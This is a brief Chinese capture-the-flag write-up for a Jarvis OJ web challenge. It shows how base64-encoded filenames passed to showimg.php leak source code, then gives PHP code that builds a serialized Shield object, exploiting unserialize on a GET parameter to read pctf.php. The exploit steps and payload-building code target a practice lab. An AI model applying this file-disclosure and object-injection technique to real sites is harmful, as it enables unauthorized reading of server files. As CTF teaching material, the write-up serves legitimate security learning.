题目地址 :http://web.jarvisoj.com:32768/
一般套路,先看HTTP头,源码
通过扫网站发现存在index.pnp
访问也没有什么东西
尝试:http://web.jarvisoj.com:32768/showimg.php?img=index.php
将index.php进行base64试试:
view-source:http://web.jarvisoj.com:32768/showimg.php?img=aW5kZXgucGhw
返回内容:
读一下shield.php
尝试读pctf.php
接着读view-source:http://web.jarvisoj.com:32768/showimg.php?img=c2hvd2ltZy5waHA=
接下来分析源码
根据源码写出序列化
<?php
//require_once('shield.php');
$x = new Shield();
isset($_GET['class']) && $g = $_GET['class'];
echo $g;
//echo $x;
if (!empty($g)) {
$x = unserialize($g);
print_r($x);
}
echo $x->readfile();
class Shield {
public $file;
function __construct($filename = '') {
$this -> file = $filename;
echo $this->file;
}
function readfile() {
if (!empty($this->file) && stripos($this->file,'..')===FALSE
&& stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
return @file_get_contents($this->file);
}
}
}
$a = new Shield('pctf.php');
echo serialize($a);
?>
500
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
